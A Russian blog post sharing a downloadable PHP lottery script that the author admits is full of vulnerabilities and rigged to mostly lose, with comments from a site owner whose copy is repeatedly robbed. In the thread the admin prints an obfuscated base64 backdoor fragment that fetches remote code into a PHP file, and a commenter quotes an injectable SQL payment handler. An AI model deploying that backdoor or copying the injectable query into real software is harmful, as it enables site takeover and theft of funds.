Реклама




Опросы

Каких скриптов не хватает ?

Просмотреть результаты

Загрузка ... Загрузка ...

Помощь проекту

 

WMID 133443326071

R341885382783

Payeer

P63968199

 

Последние сообщения на форуме

Накрутка баланса
Jak oczyścić wątrobę?
выплата

 Обратите внимание что все скрипты взяты из открытых источником и я проверяю их только на наличие критических ошибок, потому вероятность вредоносных кодов и чужих ссылок очень высока по мере сил я исправляю  скрипты  но нет никакой гарантии что в дальнейшем в работе скриптов не будет проблем. Особо стоит обратить внимание на подключение автовыплат к скриптам ферм как показала практика они очень уязвимы. Не забудьте проверить скрипт на уязвимость 

Скрипт лотереи

Скрипт лотереи

Сегодня рассмотрим скрипт лотереи. Если быть точнее то беспроигрышной лотереи. По крайней мере так было написано там где я его скачивал, а каким быть этому скрипту зависит от Вас. Изначально я даже удивился такое пафосное название, а на деле скрипт выдавал процентов 90 проиграша ну да то все дело в настройках.

скрипт лотереи

И так легкое описание

Суть скрипта проста после небольшой регистрации пользователь имеет возможность прикупить лотерейных билетов. И через одну минуту произойдет розыгрыш. Билетов шесть видов разных номиналов. Выигрыш тоже  разный всего десять позиций на каждый номинал лотереи. Есть так же рефсистема. Скрипт работает с платежной системой Payer.

скрипт лотереи

скрипт лотереи



скрипт лотереи

Скрипт простенький и админки не имеет. Но по сути она и не нужна.

Об установке.

Сложного в установке так же ничего нет. Берем создаем базу данных и загружаем скрипт на хостинг.

Как создать базу данных

Как загрузить файлы на хостинг

Следующее что нужно сделать прописать название базы данных имя пользователя к ней и пароль в файле  bd.php который находится в папке block

Где то так

<?php
$db=mysql_connect(«localhost»,»Пользователь базы данных»,»Пароль к базе»);
mysql_select_db(«Название базы данных»,$db);
?>

localhost как правило не меняем тут зависит от хостинга.

Теперь о том как можно настроить скрипт без админки.

Прежде всего если у Вас есть желание изменить ситуацию с выигрышами то нужно подредактировать файл  bilety.php

В нем ищем фрагменты вот такого кода и исправляем там расценки выигрышей.

if($_GET[‘b’] == 100) {
$rand[0] = 30;
$rand[1] = 40;
$rand[2] = 60;
$rand[3] = 70;
$rand[4] = 90;
$rand[5] = 100;
$rand[6] = 200;
$rand[7] = 400;
$rand[8] = 700;
$rand[9] = 1000;

Немного разжую что бы было понятно 100 в первой строке это номинал билета. Остальные цифры 30 40 60 70 90 и тд это возможный выигрыш при покупке лотереи 100

При таких расценках пользователь разорится довольно быстро так как выигрыши больше 100 практически отсутствуют. Я ради проверки по клацал немного.

Для выплат и пополнения редактируем файлы  pay.php и popolnenie.php

По поводу работоспособности и уязвимости

На первый взгляд скрипт работает нормально есть конечно мелкие недоработки но ничего критического. Самое первое что бросилось не работает статистика на сайте постоянно 11 человек онлайн. но последний выигрыш показывает исправно. Так же нет возможности перейти на некоторые страницы такие как FAQ. Это все конечно не существенно и исправимо.

В плане уязвимостей то как же без них в скрипте их тридцать штук удалять конечно не стал.

Велика вероятность накрутки баланса 

В архиве находится база данных и архив со скриптом.

Скачать скрипт  

 

45 комментариев к записи Скрипт лотереи

  • сергей сказал:

    этот скрипт постоянно взламывают вот такая картинка в базе данных после взлома
    683
    Boom

    176.59.77.68
    0
    09.03.2018 19:07
    -60.00

    видна в базе данных что у игрока минус сумма возможна с этим бороться или нет
    через какой файл мог произойти такой взлом

  • admin сказал:

    не помешало бы проверить его на уязвимости http://mexanus.ru/glavn/usstra/uyazvimosti/

  • сергей сказал:

    проверил весь скрипт в но есть одно но в файле status.php после замены 36 строки
    после оплаты баланс участника не меняеться баланс остаётся 0 груб
    ставлю 36 страку на место все работает
    что с этим делать или оставить как есть

    код родной который был
    mysql_query («UPDATE users SET money=money ‘».$_POST[‘m_amount’].»‘, rand=’0’ WHERE login='».$myrow[‘login’].»‘ LIMIT 1″);
    изменил на этот

    mysql_query («UPDATE users SET money=money ‘».mysql_real_escape_string($_POST[‘m_amount’]).»‘, rand=’0’ WHERE login='».$myrow[‘login’].»‘ LIMIT 1″);

  • admin сказал:

    оставляйте как есть это обработчик платежа но не забывайте что сканер это хорошо но скорее всего он все уязвимости не найдет потому как вариант не держать все деньги на кошельке для выплат

  • сергей сказал:

    посмотрю что будет после сканера самому интересно взломают или нет
    спасибо вам за совет

  • admin сказал:

    За время существования сайта Вы второй который говорит о взломе сразу после первого случая я создал страницу про уязвимости вроде помогло больше у него не взламывали но конечно методы совершенствуются и сто процентной гарантии быть не может. Это как вечная борьба оружия и брони. Единственный верный вариант не держать все яйца в одной корзине.

  • сергей сказал:

    увы но сканер не помог опять взломали

  • admin сказал:

    мне стало интересно и я решил глянуть файлы на предмет подозрительности вот что я увидел папка images2 файл Thumbs.db что это за файл не понятно но ему явно не место в папке картинок сканер его пропустил потому что он закодированый внутри да и название какое то подозрительное такой же файл в папке images и в главной папке нужно удалить все три и проверить скрипт на работоспособность если будет работать то уязвимость в них если нет то придется вычеркивать скрипт и работоспособных с закодированым файлом ничего не сделаешь

  • сергей сказал:

    файлы удалил скрипт работает нормально но скрипт все ровно взломали
    вот так выглядит в статистики вывода
    52
    Qtsb
    10.00
    16.03.2018 00:07:37
    P84596318
    -10.00

  • admin сказал:

    пускай я просмотрю все файлы а доступа к хостингу ни у кого нет может давали кому настраивать что то

  • сергей сказал:

    а вот данные пользователя из базы данных который взломал скрипт

    845
    Qtsb
    111111
    176.9.136.47
    0
    16.03.2018 00:06
    -10.00
    0
    0.00
    P84596318
    1521148060
    0

    видно по времени что понадобилось для взлома буквально минуту наверно серьёзный инструмент у хакера

  • admin сказал:

    Или имеется хорошая дыра в скрипте буду смотреть но гарантий никаких в идеале вообще автовыплаты не включать в любом скрипте из информации по взломщику можно заблокировать ему вход по ip это не панацея конечно но нестоит упрощать взлом

  • сергей сказал:

    поставил запрет на ip адрес посмотрим что из этого выйдет время покажет если взломают или не взломают
    напишу обязательно

  • admin сказал:

    IP не сложно сменить тут нужно каждый файл перебирать с паером все не так просто есть мнение что сам паер и подкрадает

  • сергей сказал:

    чтобы было немного понятней я снял краткий обзор что видно в базе данных после взлома
    лучше один раз увидеть ссылка на видео https://youtu.be/9Jv2YYzCTqw

  • admin сказал:

    пишет видео не доступно

  • сергей сказал:

    попробуйте снова видать допустил ошибку ссылка https://youtu.be/9Jv2YYzCTqw

  • admin сказал:

    любопытно скорее всего придется устанавливать смотреть файлы посмотрел ничего подозрительного не увидел вернее все не понравилось

  • сергей сказал:

    опять взломали только ip адрес другой а кошелек тот который был
    не подскажете как выводы сделать в ручном режиме

  • admin сказал:

    можно приспособить какой нибудь из модулей для фруктовой фермы но это потребует значительного переделывания как модуля так и самого скрипта самый простой вариант написать на странице вывода выигрыш выплачивается по достижению определенной сумы на балансе либо как более жесткий вариант обратитесь за выиграшом с помощью WMID и прописать свой вмид. И выплачивать прямым переводом с кошелька.

  • admin сказал:

    я кстати не нашел дыру в скрипте все не нравится слишком много переменных из вне $_POST и $_GET

  • admin сказал:

    еще нюанс сканер не все исправляет но все подозрительное показывает вот такой фрагмент не попадался когда сканировали
    } if (!isset($_COOKIE[base64_decode(‘X3ltXl1cw==’)])) { @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL3Av’).$_SERVER[‘HTTP_HOST’]); @setcookie(base64_decode(‘X3X2l1cw==’), 1, time() 31536000, ‘/’, $_SERVER[‘HTTP_HOST’]); } if (isset($_COOKIE[base64_decode(‘cmVkNHU=’)])) { @file_put_contents(base64_decode(‘c3hdGUucGhw’), @file_get_contents(base64_decode(‘aHR0cDovL2wxbDAuY29tL2QudHh0’))); }
    Или что то похожее ?

  • сергей сказал:

    если и попадался то сканер исправил я думаю разве все упомнишь сканировал снова
    сканер показывает тоже самое о чем я писал ранее
    даже незнаю каким методом можно проверить дополнительно

  • admin сказал:

    может есть смысл поискать другой скрипт

  • сергей сказал:

    наверно дело тут не в скрипте скрипт отличный в течение пол года скрипт ломал один человек
    это можно видеть куда уходили деньги сюда -P84596318 любопытно другое как только я отключил
    авто выплаты буквально через 6 часов я прошу заметить что скрипт простоял пол года
    блокируют хостинг вот что написали

    Здравствуйте, На территории РФ для размещения хайп-проектов(проектов, которые подразумевают под собой получение денег от клиентов с последующим возвратом с процентами) вам нужно обратиться в Центральный банк РФ с просьбой выдать лицензию, предоставляющую право на прием депозитных вкладов от частных лиц в рублях и иностранной валюте. Далее обратиться к нам с полным пакетом документов, и мы разрешим размещение данного сайта.

    наверно это кто то из работников beget возможна такое как вы думаете

    может посоветуете недорогой хостинг

  • admin сказал:

    Все возможно только каким образом лотарея на хайп похожа не понятно буду у компьютера дам ссылку на дешовый хостинг

  • admin сказал:

    Вот https://justhost.ru/ дешевле не придумать платите только за место от 30 копеек в месяц

  • admin сказал:

    Насчет работников бегет все возможно у них точно доступ ко всем файлам есть и к базе данных тоже нужно отзывы про этот хостинг почитать я на нем никогда не был

  • сергей сказал:

    спасибо за ссылку по крайне мере не блокируют

  • admin сказал:

    а деньги воруют или нет ?

  • сергей сказал:

    деньги воровать перестали
    правда была регистрация с замеченным ранее кашельком и ip адресом
    но взлома не была поднял огранечения вывода до 20 руб
    на щету всегда рублей 18 взломы прекротились

  • EVg сказал:

    Thumbs.db Это файл кэширования от системы Windows. Раньше тоже думал что херня появляется после того как на комп сайт перетащу из Filezila, а это виндовс картинки кэширует оказывается. Thumbs.db вообще не должно быть видно на винде так как он скрытый тип имеет.
    Дыры у сайтов-точнее шелы это когда в папке js например лежит jquery.php или в папке картинок image.php
    название у файлов не вызывает подозрений, а ВОТ РАСШИРЕНИЕ-PHP ВМЕСТО JS и GIF соответственно. Внутри них обычно закодированный код-форма авторизации для проникновения к базе,хостингу…
    Возможно чтоб обезопасится может помочь изменение имени пути админки ИЛИ полного её удаления и управление через базу данных.

  • EVg сказал:

    чтобы онлайн работал на index.php 23 строке 10 поменять на ноль- сайт если никого нет даже накидывает 10 онлайн человек.

  • Дима сказал:

    Регистрация не работает.

  • admin сказал:

    попробуйте сменить версию php на 5.3

  • Дима сказал:

    Спасибо. Можно Вашу почту?

  • Дима сказал:

    admin, спасибо. Можно Вашу почту?

  • admin сказал:
  • Володя сказал:

    Я Вам в почту отписался.

  • Cергей сказал:

    как я не бился не пытался нечего не выходит все дело наверно в этом _loginCtrl.php файле
    выдает ошибку можно видеть на сайте
    ссылка на сам скрипт
    может что и подскажете вот весь код этого файла

    $config->client_id,
    ‘redirect_uri’ => $config->redirect_uri,
    ‘scope’ => ’email,photos’,
    ‘response_type’ => ‘code’
    );

    $data[‘auth’] = $url . «?» . urldecode(http_build_query($params));

    if (isset($_GET[‘code’])) {
    $result = false;

    $params = array(
    ‘client_id’ => $config->client_id,
    ‘client_secret’ => $config->client_secret,
    ‘code’ => $_GET[‘code’],
    ‘redirect_uri’ => $config->redirect_uri
    );

    $token = json_decode(file_get_contents(‘https://oauth.vk.com/access_token’ . ‘?’ . urldecode(http_build_query($params))), true);

    if (isset($token[‘access_token’])) {
    $params = array(
    ‘uids’ => $token[‘user_id’],
    ‘fields’ => ‘uid,first_name,last_name,photo_100’,
    ‘access_token’ => $token[‘access_token’]
    );

    $userInfo = json_decode(file_get_contents(‘https://api.vk.com/method/users.get’ . ‘?’ . urldecode(http_build_query($params))), true);
    if (isset($userInfo[‘response’][0][‘uid’])) {
    $userInfo = $userInfo[‘response’][0];
    $result = true;
    }
    }

    if ($result) {

    $uid = $userInfo[‘uid’];
    $email = $token[«email»];
    $first_name = $userInfo[‘first_name’];
    $last_name = $userInfo[‘last_name’];
    $screen_name = $first_name . ‘ ‘ . $last_name;
    $photo_100 = $userInfo[‘photo_100’];

    $ref_1 = 0;
    $ref_2 = 0;
    $ref_3 = 0;

    $db->Query(«SELECT * FROM users WHERE uid = ‘{$uid}'»);
    $user_data = $db->FetchArray();

    /*
    if($user_data[‘id’] != 1){

    $db->Query(«SELECT COUNT(*) FROM users WHERE ip = ‘{$ip}'»);
    if (intval($db->FetchRow()) > 1){

    $db->Query(«SELECT * FROM users WHERE ip = ‘{$ip}'»);
    $ban_data = $db->FetchAll();

    foreach($ban_data as $ban){
    if($user_data[‘id’] != $ban[‘id’]){
    $db->Query(«UPDATE users SET ip = ‘0’ WHERE id = ‘{$ban[‘id’]}'»);
    }
    $db->Query(«UPDATE users SET ban = ‘2’ WHERE id = ‘{$ban[‘id’]}'»);
    }
    }

  • admin сказал:

    строка в которой ошибка ссылается на oauth.vk.com/access_token насколько я понимаю в контакте нужно регистрировать свой сайт в инструкции есть что то

  • Сергей сказал:

    не могу поменять баланс дело в том когда я меняю выигрыш меньше рубля 0.70 и так далее
    то при розыгрыше выигрыш 0 когда когда меняю на 1 все нормально
    if($_GET[‘b’] == 1) {
    $rand[0] = 0.10;
    $rand[1] = 0.20;
    $rand[2] =0.30;
    $rand[3] = 0.40;
    $rand[4] = 0.50;
    $rand[5] = 1;
    $rand[6] = 2;
    $rand[7] = 3;
    $rand[8] = 4;
    $rand[9] = 5;

    а где сделать настройку я не нашел может кто подскажет где что нужно поправить

  • admin сказал:

    Нужно ставить смотреть так не скажу но подозреваю что просто прописано целое число стоит попробовать что то типа 1.5 посмотреть что будет я бы первым делом полез в базу данных скорее всего загвоздка там

  • Серей сказал:

    попробовал таким образом
    $rand[0] = 1.5;
    $rand[1] = 1.6;
    $rand[2] = 1.3;
    $rand[3] = 1.4;
    $rand[4] = 1.7;
    $rand[5] = 1.8;
    $rand[6] = 1.3;
    $rand[7] = 1.4;
    $rand[8] = 1.2;
    $rand[9] = 1.1;
    при розыгрыши разыгрывается однозначная число после точки па идеи должно 1.7 но нет выигрыш 7
    а где примерно искать в базе данных

  • admin сказал:

    Смотрите в структуре таблиц float это дробные числа а int целые
    но может быть и в самом скрипте округление быть

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.